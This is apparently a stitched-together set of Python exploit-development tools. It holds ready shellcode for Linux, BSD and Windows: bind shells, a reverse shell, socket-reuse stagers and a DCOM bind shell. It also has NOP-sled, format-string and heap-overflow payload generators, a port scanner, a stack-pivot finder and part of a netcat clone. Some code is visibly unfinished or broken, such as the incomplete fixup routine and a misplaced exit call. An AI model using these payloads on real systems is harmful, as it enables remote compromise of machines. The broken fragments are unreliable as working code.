SHELLS['bsd-findtag-stager'] = b"\x31\xd2\x52\x89\xe6\x52\x52\xb2\x80\x52\xb6\x0c\x52\x56\x52"+b"\x52\x66\xff\x46\xe8\x6a\x1d\x58\xcd\x80\x81\x3e\x48\x45\x62"+b"\x44\x75\xef\xfc\xad\x5a\x5f\x5a\xff\xe6"
SHELLS['bsd-findtag-shell'] = struct.pack(b"L",0x44624548) + b"\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x6a\x02\x59\x6a\x5a\x58"+b"\x51\x57\x51\xcd\x80\x49\x79\xf5\x6a\x3b\x58\x99\x52\x68\x2f"+b"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x54\x53\x53\xcd"+b"\x80"

#SHELLS['bsd-findtag-shell'] = b"\x31\xc0\x50\x50\xb0\x7e\x50\xcd\x80\x6a\x02\x59\x6a\x5a\x58"+b"\x51\x57\x51\xcd\x80\x49\x79\xf5\x6a\x3b\x58\x99\x52\x68\x2f"+b"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x54\x53\x53\xcd"+b"\x80"

SHELLS['lin-findtag-stager'] = b"\x31\xdb\x53\x89\xe6\x6a\x40\xb7\x0a\x53\x56\x53\x89\xe1\x86"+b"\xfb\x66\xff\x01\x6a\x66\x58\xcd\x80\x81\x3e\x52\x59\x4a\x51"+b"\x75\xf0\x5f\xfc\xad\xff\xe6"
SHELLS['lin-findtag-shell'] = struct.pack(b"L",0x514a5952) + b"\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b"+b"\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"+b"\x52\x53\x89\xe1\xcd\x80"

def checkBytes(string, avoidbytes):
    for c in string:
        if c in avoidbytes:
            return False
    return True

incbytes = '\xfe\x43'
def fixup(shellcode, avoidbytes = b"\x00\x0a",  MAXBUFFER=100):
    problems = []
    for b in range(len(shellcode)):
        if shellcode[b] in avoidbytes:
            problems.append(b)
    sizeperfixup = 3
    span = len(shellcode) + sizeperfixup * len(problems) # bytes between jmp-call-bounce

    # check if negative offset bytes for any of the problem bytes will trigger the avoidbytes
    good = False
    buffersize = 0
    while not good and buffer < MAXBUFFER:
        fixes = []
        good = True
        for prob in problems:
            fix = b"%c"%(span-prob)  # negative index from end of shellcode backward
            if fix in avoidbytes:
                good = False
                buffer += 1
                span += 1
                break
            else:
                fixes.append((prob,fix)) # offset-byte and index from front 
                
    # Check the inc and dec methods...  FIXME: above checking assumes offset-based fixes...  only inc/dec?  can we xor without guargantuan encoders?  Or do we can that and just use a completely different approach like shikata-ganai or other xor-key approach?
    bufbyte = 1
    while b"%c"%bufbyte in avoidbytes:
        bufbyte += 1
    prepend = [b"\xeb", struct.pack(b"<B", span), '\x5b']    # jmp <span>; pop ebx
    append  = [bufbyte*buffer, b"\xe8", struct.pack(b"<L", -5-span)]
    
    for prob,fix in fixes:
        # Check if inc or dec will work...
        problemchild = shellcode[span-fix]
        proposal = b"%c"%(ord(problemchild)+1)
        if not proposal in avoidbytes:
            useincoffset = "FIXME: apparently i never finished this and i don't have time to now.... crap."
            
            offsetbyte, = (struct.pack(b"<B", span-fix))
            # is the fix as bad as the problem?
            if offsetbyte not in avoidbytes:
                prepend.append(incbytes)
                prepend.append(offsetbytes)
        

    
#  23:   c7 44 24 04 c3 c9 80    movl   $0xcc80c9c3,0x4(%esp)
#  2a:   cc
#  2b:   fe 44 24 04             incb   0x4(%esp)
#  2f:   ff 54 24 04             call   *0x4(%esp)
#  33:   ff 64 24 04             jmp    *0x4(%esp)
#  37:   c7 44 24 fc c3 c9 80    movl   $0xcc80c9c3,0xfffffffc(%esp)
#  3e:   cc
#  3f:   8d 54 24 fc             lea    0xfffffffc(%esp),%edx
#  43:   fe 44 24 fc             incb   0xfffffffc(%esp)


# port 4444 bindshell
SHELLS['win32-dcom'] = \
    b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\
    b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\
    b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\
    b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\
    b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\
    b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\
    b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\
    b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\
    b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\
    b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\
    b"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"\
    b"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"\
    b"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"\
    b"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"\
    b"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"\
    b"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"\
    b"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"\
    b"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"\
    b"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"\
    b"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"\
    b"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"\
    b"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"\
    b"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"\
    b"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"\
    b"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"\
    b"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"\
    b"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"\
    b"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"\
    b"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"\
    b"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"\
    b"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"\
    b"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"\
    b"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"\
    b"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"\
    b"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"\
    b"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"\
    b"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"\
    b"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"\
    b"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"\
    b"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"\
    b"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"\
    b"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04"





######################### END OF SHELL DEFINITIONS #########################



################################### ShellCode ##################################################################

def genNOP(size, NOPS = None):
  """  genNOP is used to create an arbitrary length NOP sled using characters of your choosing.
  Perhaps you prefer \x90, perhaps you like the defaults.  Given a list of NOP characters, 
  genNOP will randomize and spit out something not easily recognized by the average human/rev engineer.
  Still, while you are working a vulnerability, you may prefer to specify one byte such as "A" or 
  "\x90" as they are easily identified while searching memory.
        Defaults:
        # inc eax       @       \x40
        # inc ecx       A       \x41
        # inc edx       B       \x42
        # inc ebx       C       \x43
        # inc esp       D       \x44
        # inc ebp       E       \x45
        # inc esi       F       \x46
        # inc edi       G       \x47
        # dec eax       H       \x48
        # dec esx       J       \x4a
        # daa           '       \x27
        # das           /       \x2f
        # nop                   \x90
        # xor eax,eax           \x33\xc0
  """
  if (not NOPS):    NOPS = DEFAULT_NOPS
  
  sled = b""
  for i in range(size,0,-1):
    N = random.randint(0,len(NOPS)-1)
#    print("" + str(N) +  " + " +NOPS)
    sled += NOPS[N]
  return sled

def genShellbyarray(argv):
  """  genShellbyarray is simply a convenience method for use by genShell.py """
  argv.append(b"0")
  argv.append(b"0")
  
  return genShell(argv[1],int(argv[2]),int(argv[3]))

def genShell(shellname, size=-1, front=0, PREFIX=b"", NOPS=None) :
  """  genShell spits out a properly sized shell of your choosing.
  genShell takes three parameters:
      shellname    specifies the name of the shellcode as named in the SHELLS hash
      size         specifies the overall desired size with NOPs
      front        specifies how many of the NOPs should be in the beginning of the resulting shellcode (>0)

  If left unspecified, the selected shell is padded with a 30byte NOP sled, all in the front.
  """
  shell = PREFIX + SHELLS.get(shellname)

  diff = size - len(shell) 
  if (size == -1): 
      diff = 30
  elif (size == 0): 
      diff = 0
  if (diff < 0):  
      print(  "Too Small! Size=" + repr(len(shell)), file=stderr)
  sys.exit(1)

  if (front == 0) :
    front = diff
    rear = 0

##### "-" means the third parameter determines the size of NOPs *after* the shellcode
  elif (front < 0):
    front = diff + front
    rear = diff - front

##### otherwise, the third parameter determines the size of the NOPs *before* the shellcode
  else :
    rear = diff - front
    if ((front + rear) > diff):  
        print( "WRONG!! Size=" + repr(len(shell)) + " and front and rear are too big!", file=stderr)
        sys.exit(1) 
    if ((rear <0)):          
        print( "WRONG!! Size=" + repr(len(shell)) + " and front is too big to go on the front!", file=stderr)
        sys.exit(1) 
    if ((front <0)):         
        print( "WRONG!! Size=" + repr(len(shell)) + " and rear is too big to tag on the end!", file=stderr)
        sys.exit(1) 

  SHELLCODE = genNOP(front, NOPS) + shell + genNOP(rear, NOPS)

  return(SHELLCODE)


def genShellobscure():
  SHELLCODE = b"".join([ b"\x90" for x in range(0,30)]) + b"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff/bin/sh\x00"

  return(SHELLCODE)



def hex_reverse(input):
  """  hex_reverse takes an 4-byte (8 character) hex number, makes it little-endian and returns the 4-byte binary representation
  """
  output = b""
 
  inputstring = b"%08x"  % input

  if (inputstring[1] == b"x") :
    input = inputstring[2:] 

  b1 = inputstring[0:2]
  b2 = inputstring[2:4]
  b3 = inputstring[4:6]
  b4 = inputstring[6:8]

  print( 'Reversed Hex: %02s%02s%02s%02s' % ((b4), (b3), (b2), (b1)) , file=stderr)
  return struct.pack(b'<L', (input))


######################## Format Strings #######################################################################################################
def format_string(address, startoffset=16, ptroffset=4):
  """  format_string takes in an address, chops it up, and generates format-string code to appropriate lengths for a format string exception
  It is intended to be called by genformatstring()
      offset = how many bytes are in the shellcode inserted in the middle of the FSE
      ptroffset = special offset for strings which are not perfectly clean... (formerly 'stringoffset' which was too ambiguous)
                     this can be used for special manipulation of which 32bit chunks are used...(think Mangle)
                     Think of this as an offset to get to the address in memory (%#$n offset)

  """

  output = b""
  saddress = b"%08x" % address
  decimal = 0
  if (saddress[0:2] == b"0x") :
    saddress = saddress[2:]

  h1 = (address >> 24)
  h2 = (address >> 16) & 0xff
  h3 = (address >> 8)  & 0xff
  h4 = (address)       & 0xff
 
  decimal = h4 - startoffset
  while (decimal < 8):
    decimal +=256
 
  output +=  b"%" +repr(decimal)+b"x%"+ repr(ptroffset) + b'$n'

  decimal = h3-h4
  while (decimal < 8):
    decimal +=256
 
  output +=  b"%" +repr(decimal)+b"x%"+ repr(1+ptroffset) + b'$n'

  decimal = h2-h3
  while (decimal < 8):
    decimal +=256
 
  output +=  b"%" +repr(decimal)+b"x%"+ repr(2+ptroffset) + b'$n'

  decimal = h1-h2
  while (decimal < 8):
    decimal +=256
 
  output +=  b"%" +repr(decimal)+b"x%"+ repr(3+ptroffset) + b'$n'

  return output


def genformatstring(overwriteaddress = 1, withaddress=0x41414141, ptroffset=4, prefix=[], inline=False):
  """  genformatstring accepts two addresses, a prefix string, and a flag to indicate there is a prefix in stdin
  The first address is the address to be overwritten
  The second address is the address to place at the location to be overwritten
  prefix is an array of strings to be prepended to the format string for whatever purpose
  If inline == true, a prefix is read in from stdin (as in the prefix was piped to this process)
        Note:  different printf's (printf, sprintf, vprintf, fprintf, etc...) use different internal structures, and 
        which numbers (%4$n, etc...) are used differ between them.  You can use "offset" to alter the behavior
        printf()        - %4$n      - default offset is good
        sprintf()       - %2$n  - use (-2) for offset
  """

  output = b""

  if (inline) :
    prefix = sys.stdin.read()
  
  if (type(overwriteaddress) == str):       overwriteaddress = int(overwriteaddress,16)
  if (type(withaddress) == str):            withaddress = int(withaddress,16)

  print( "Format String to overwrite the four bytes at %08x with %08x" % (overwriteaddress, withaddress), file=stderr)
  print( "Four memory locations of interest:", file=stderr)

  output += (hex_reverse(overwriteaddress))
  output += (hex_reverse(overwriteaddress+1))
  output += (hex_reverse(overwriteaddress+2))
  output += (hex_reverse(overwriteaddress+3))
  if (prefix):
      output += prefix
  output += (format_string(withaddress, len(output), ptroffset))
  return output



def genHeapOF(bufsize, overwritewith, overwritewhere, string = "", addrsize = 4):
    what=overwritewith
    where=overwritewhere
    """ not tested thoroughly yet """
    if not isinstance(what, str):
        what = struct.pack(b'L', what-8)
    if not isinstance(where, str):
        where = struct.pack(b'L', where)
    fillspace = bufsize - (2*addrsize)
    padspace = 8 - ((bufsize + 4) %8) - (addrsize)
    strlen = len(string)
    if strlen > fillspace:
        print( ("ERROR:  string must be < %d characters in length"%fillspace), file=stderr)
        exit(1)
    hof = what + where + b"B"*fillspace + b'\xfc\xff\xff\xff' + b"D"*padspace + b'\xfc\xff\xff\xff' + what + where
    return hof

def xw(address):
  """  xw takes in an address and reverses it and returns little-endian..  It was inspired by gdb's x/32xw
  Don't ask me why I developed both hex_reverse *and* xw.  I must have been asleep at the time.  Actually, hex_reverse was born 
  out of the genformatstring.pl tool and xw was born from the hack.pl library.  When they were combined, it was overlooked that
  they did the same thing.  When converting to Python, I still apparently missed this fact.
  """

  ret = b""

  if (type(address) != str):
    address = hex(address) 

  print( "xw(" + address + ")", file=stderr)

  if (address[1] == b"x"): address = address[2:]
  if (address[0] == b"x"): address = address[1:]

  if (len(address) % 2 == 1): address = b"0"+address
 
  for i in range(len(address),0,-2):
    byte = address[ i-2: i]
    print(byte)
    ret += b'%c'%(int(byte,16))
  
  return ret


def getPackedIP(addr):
        pckdaddr = b""
        last = 0
        loc = addr.find(b".")
        if (loc > -1):
                while (loc > -1):
                        pckdaddr += b'%c'%(int(addr[last:loc]))
                        last = loc+1
                        loc = addr.find(b".",last)
                pckdaddr += b'%c'%(int(addr[last:]))
        return pckdaddr[::-1]

def BSDnetShell(port):
        port_bin = struct.pack('H', port)[::-1]

        shellcode = b"\x6a\x61\x58\x99\x52\x68\x10\x02" + port_bin +b"\x89\xe1\x52\x42\x52\x42" + b"\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0" + b"\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a" + b"\x58\x51\x57\x51\xcd\x80\x49\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68" + b"\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80"

        return(shellcode)


def BSDnetShell2(port) :
        port_bin = struct.pack(b'H', port)[::-1]

        shellcode =b"\x6a\x61\x58\x99\x52\x68\x10\x02" + port_bin + b"\x89\xe1\x52\x42\x52\x42" + b"\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0" + b"\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a" + b"\x58\x51\x57\x51\xcd\x80\x49\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68" + b"\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80"

        return(shellcode)


def LINrevShell(host, port):
        off_host = 0x1a
        off_port = 0x20

        host_bin = getPackedIP(socket.gethostbyname(host).encode('utf-8'))[::-1]
        port_bin = struct.pack(b'H', port)[::-1]

        shellcode =\
                b"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" +\
                b"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x01\x01\x01\x66\x68" +\
                b"\xbf\xbf\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" +\
                b"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +\
                b"\x89\xe1\xb0\x0b\xcd\x80"
        
        shellcode = shellcode[:off_host] + host_bin + shellcode[off_host+4:]
        shellcode = shellcode[:off_port] + port_bin + shellcode[off_port+2:]


        return(shellcode)
def LINbindShell(port=47145):
        off_port = 0x14

        port_bin = struct.pack(b'H', port)[::-1]

        shellcode =\
                b"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +\
                b"\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +\
                b"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +\
                b"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" +\
                b"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +\
                b"\x89\xe1\xcd\x80"


        shellcode = shellcode[:off_port] + port_bin + shellcode[off_port+2:]

        return(shellcode);

def LINfindSock():
        """linux_ia32_findsock -  CPORT=47145 Size=62 Encoder=None http://metasploit.com """
        return \
        b"\x31\xd2\x52\x89\xe5\x6a\x07\x5b\x6a\x10\x54\x55\x52\x89\xe1\xff" +\
        b"\x01\x6a\x66\x58\xcd\x80\x66\x81\x7d\x02\xb8\x29\x75\xf1\x5b\x6a" +\
        b"\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x52\x68\x2f\x2f\x73\x68\x68" +\
        b"\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"

# Network Bind
shell = BSDnetShell(47145) 
SHELLS.setdefault(b'bsd-netshell', shell)

shell = BSDnetShell2(47145)
SHELLS.setdefault(b'bsd-netshell2', shell)

shell = LINrevShell(b"127.1.1.1",47145)
SHELLS.setdefault(b'lin-reverse-shell', shell)

shell = LINbindShell(47145)
SHELLS.setdefault(b'lin-bind-shell', shell)

shell = LINfindSock()
SHELLS.setdefault(b'lin-find-sock', shell)




from vstruct.primitives import *
import vstruct

PTRFMT = '<I'
PTRSIZE = 4
ALIGNSIZE = 4

# Vstruct classes
class VpdbHdr (vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.hdrString      = v_zstr(align=ALIGNSIZE)
        self.pageSize       = v_uint32()
        self.unk0           = v_uint32()
        self.pageCount      = v_uint32()
        self.totalStreamSize= v_uint32()
        self.unk1           = v_uint32()
        self.streamDir      = v_uint32()

class VpdbStreamDirMeta (vstruct.VStruct):
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.streamCount    = v_uint32()
        self.streamSizeArray= VArray([])


# parser class(es)
class PDB:
    def parse(self, datastream):
        self.datastream = datastream
        
    def parseHeader(self):
        #idx = 0
        #while idx<len(self.datastream) and self.datastream[idx] != '\x1a':
            #idx += 1
        #self.hdrStringEnd = idx
        
        #idx += 1
        ## skip the signature as well
        #while idx<len(self.datastream) and self.datastream[idx] != '\x00':
            #idx += 1
        #self.hdrSigEnd = idx
        
        ## true off to the next dword boundary
        #idx += (ALIGNSIZE - (idx % ALIGNSIZE) )
        
        # now parse the data fields
        self.hdrInfo = VpdbHdr()
        self.hdrInfo.vsParse(self.datastream[idx+1:])
        
    def getHdrSig(self):
        return self.datastream[self.hdrStringEnd: self.hdrSigEnd]
    
    def getStreamDirDataRaw(self):
        out = []
        pgsize = self.hdrInfo.pageSize
        
        # parse through the data directory allocation table
        idx = self.hdrInfo.streamDir * pgsize
        ptr = self.datastream[ idx : idx+PTRSIZE ]
        EOS = '\x00'* PTRSIZE
        while ptr != EOS:
            page, = struct.unpack(PTRFMT, ptr)
            data = self.datastream[ page*pgsize : (page+1)*pgsize ]
            out.append(data)
            
        return ''.join(out)
    
    def getStreamDirData(self):
        pass
        


import socket,sys,select
def portscan(host, portstart=0, portstop=10000, verbose=False, nudge=False, timeout=.3):
    socket.setdefaulttimeout(timeout)
    ports=[]
    for x in xrange(portstart,portstop):
        try:
            s=socket.socket()
            s.connect((host,x))
            if verbose:
                print x
            ports.append(x)
        except Exception,e:
            if not str(e).startswith('(111,' ):
                print " ERROR AT PORT %d"%x
                x,y,z=sys.exc_info()
                print sys.excepthook(x,y,z)
    return ports

def nudge(sock=None, host=None, port=-1, polltimeout=10):
  output = ""
  try:
    if sock == None:
        sock = socket.socket()
        sock.connect((host,port))
    p = select.poll()
    p.register(sock.fileno(),3)
    r = p.poll(polltimeout)
    if r and r[0] and r[0][1] & 3:
        output += sock.recv(10000)
    else:
        sock.sendall('\n\n \n\n')
        r = p.poll(polltimeout)
        if r and r[0] and r[0][1] & 3:
            output += sock.recv(10000)
  except Exception, e:
    x,y,z = sys.exc_info()
    sys.excepthook(x,y,z)
  return output

        



class props (dict):
    ### Saving the asm:
    def save(self, filename = "save.asm"):
        outf = open(filename, "w")
        keys = self.keys()
        keys.sort()
        for i in keys:
            i = i.replace("=", "\\x3d")
            outf.write("%s=%s\n"%(i, mydict.get(i)))
        outf.close()
    
    
    ### Loading the asm:
    def load(self, filename = "save.asm"):
        lines = open(filename).readlines()
        for i in lines:
            addy, asm = i.strip().split("=")
            addy = addy.replace("\x3d", "=")
            self.setdefault(addy, asm)
        return self





# vivisect script to dump a function to a .s file

def dumpFunc(vw, fva, filename):
    o = []
    
    funcva = vw.getFunction(fva)
    blocks = vw.getFunctionBlocks(funcva)
    for block in blocks:
        bva, sz, fnva = block
        eva = bva+sz
        va = bva
        while va < eva:
            op = vw.parseOpcode(va)
            print op
            o.append(str(op))
            va += len(op)
            
        outf = file(filename, 'w').write( '\n'.join(o) )

#FIXME: make a renderCanvas that changes addresses to locations and adds in labels
class textRenderer(MemoryRenderer):
    """
    chews up a VivWorkspace thing and spits out the text for it
    """

    def rendSymbol(self, mcanv, va):
        """
        If there is a symbolic name for the current va, print it...
        """
        sym = mcanv.syms.getSymByAddr(va)
        if sym != None:
            mcanv.addVaText("%s:\n" % repr(sym), va)

    def rendVa(self, mcanv, va):
        tag = mcanv.getVaTag(va)
        mcanv.addText("%.8x:" % va, tag=tag)

    def rendChars(self, mcanv, bytes):
        for b in bytes:
            val = ord(b)
            bstr = "%.2x" % val
            if val < 0x20 or val > 0x7e:
                b = "."
            mcanv.addNameText(b, bstr)

    def render(self, mcanv, va):
        """
        Render one "unit" and return the size you ate.
        mcanv will be a MemoryCanvas extender and va
        is the virtual address you are expected to render.
        """
        raise Exception("Implement render!")


#!/usr/bin/env python
"""  this script simply grabs EIP and ESP from a core dump, prints each and compares them.  This can be helpful
as a metric while brute-forcing a randomized stack from the commandline. 

dumping core is required ("ulimit -c unlimited" in a bash shell)

This is not an exacting tool.  It simply allows you to tell when you've placed EIP within len(SHELLCODE) after ESP.  It's purpose is 
somewhat of a safeguard, in case your shellcode doesn't work.  
"""
import struct
from sys import stdin,argv
from os import getenv

#shell=getenv("SHELLCODE", "")
MIN=int(argv[1])
MAX=int(argv[2])
f=open('core')
code = f.read()
a=struct.unpack("I",code[0x2c0:0x2c4])[0]
b=struct.unpack("I",code[0x2cc:0x2d0])[0]
d = a-b
#print( "(i)%x - (s)%x = %x (shell=%x)"%(a,b,d, len(shell)))
print( "(i)%x - (s)%x = %x "%(a,b,d))
#if (d>1 and d < len(shell)):
if (d>MIN and d < MAX):
	stdin.readline()


#!/usr/bin/env python
#####!/usr/bin/env python2.4

"""
regression tester for invisigoth's vtrace
"""

from atlasutils.vtraceutils import *
from sys import *
import select
import time

app='kcalc'

if len(argv) > 1:
    app=argv[1]
print >>stderr,("Starting Test of Visigoth's Vtrace against '%s' (assuming you have started %s)"%(app,app))
print >>stderr,("* Attaching to first instance of %s"%app)
me = atch(app)
me.registerNotifier(vtrace.NOTIFY_ALL, VerboseNotifier())


print >>stderr,("\n\n\n* stepi() (100 times fast)")
for i in range (100):
    me.stepi()
    
print >>stderr,("\n\n\n= setting NonBlocking to True")
me.setMode("NonBlocking", True)

print >>stderr,("* run()")
me.run()

print >>stderr,("     (sleep for 10 secs)")
select.select([],[],[],10)

print >>stderr,("* sendBreak()")
me.sendBreak()
select.select([],[],[],.5)
print(me)


while (me.getProgramCounter() > 0xf0000000):
    stepi(me)

for i in range(100):
    eip = me.getProgramCounter()
    if (eip < 0xf0000000):
        print >>stderr,("\n* addBreakpoint(DisplayBreaker(0x%x))"%eip)
        try:
            me.addBreakpoint(DisplayBreaker(eip))
            #me.addBreakpoint(Breakpoint(eip))
        except:
            a,b,c=exc_info()
            excepthook(a,b,c)
    me.stepi()

print >>stderr,("= setting RunForever to True")
me.setMode("RunForever", True)

print >>stderr,("* run()")
me.run()

print >>stderr,("     (sleep for 120 secs)")
select.select([],[],[],120)





import vivisect
import atlasutils.hacklib as ahl

def findPivots(vw):
    if vw.arch._arch_name in ('amd64', 'i386'):
        pivotbytes = ahl.PIVOTBYTES_x86
    else:
        raise Exception("Architecture Pivot Bytes unknown for arch %s" % repr(vw.arch._arch_name))
    
    retval = []
    for needle in pivotbytes:
        for pivotva in vw.searchMemory(needle):
            retval.append((pivotva, vw.parseOpcode(pivotva)))
    return retval






def cleanVW(vw, filename=None):
    vw2 = vivisect.VivWorkspace()

    if filename == None:
        filename = vw.metadata['StorageName'].strip('.viv')

    vw2.loadFromFile(filename)
    vw2.analyze()
    
    #functions first
    newfuncvas = vw2.funcmeta.keys()
    for funcva in vw.funcmeta.keys():
        if funcva not in newfuncvas:
            vw2.makeFunction(funcva)

    #then codeblocks
    for cb in vw.codeblocks:
        if cb not in vw2.codeblocks:
            vw2.makeCode(cb)

    #then loclist:
    for loctup in vw.loclist:
        lva, lsize, ltype, linfo = loctup
        if loctup not in vw2.loclist:
            for nltidx in xrange(len(vw2.loclist)):
                nlt = vw2.loclist[nltidx]
                nva, nsize, ntype, ninfo = nlt
                if nva == lva:
                    vw2.loclist.pop(nltidx)
                    break

            vw2.addLocation(lva, lsize, ltype, linfo)
        
    #then va_by_name
    newvanames = vw2.va_by_name.keys()
    for vaname,va in vw.va_by_name.items():
        if vaname not in newvanames:
            vw2.makeName(va, vaname)

    #then bookmarks (vasets)

    return vw2



#!/usr/bin/python
"""
as the name suggests, this is NetCat writtin entirely in Python.  
Not all features are supported from netcat, and additional functionality (RAW sockets) has been added.
see "nc.py --help" for syntax
"""
import sys
from select import *
from socket import *
from os import *


INTERACTIVE = False
MONOGOMOUS = False
LISTENHARDER = False
VERBOSE = False
VERYVERBOSE = False
RAW_SNIFF=False
VER=1.2

class wratchet:
	""" wratchet is a "universal" tool which handles sockets and file-descriptors"""
	# pointers to the actual send and recv methods
	send = None
	recv = None

	s = None

	laddr = None
	lport = None
	rport = None
	raddr = None

	fd = None		# use this for the input
	fd2 = None		# use this for the output descriptor

	def __init__(self, socket = None, laddr = None, lport=None, raddr = None, rport=None, proto=None, isStdin = False):
		
		if socket: self.setSocket(socket)
		if laddr: self.setLAddr(laddr)
		if lport: self.setLPort(lport)
		if raddr: self.setRAddr(raddr)
		if rport: self.setRPort(rport)
		if proto: 
			
			self.setProto(proto)
			if (self.proto != 6):	self.makeRAW()
		else:
			self.makeTCP()
		self.isStdin = isStdin

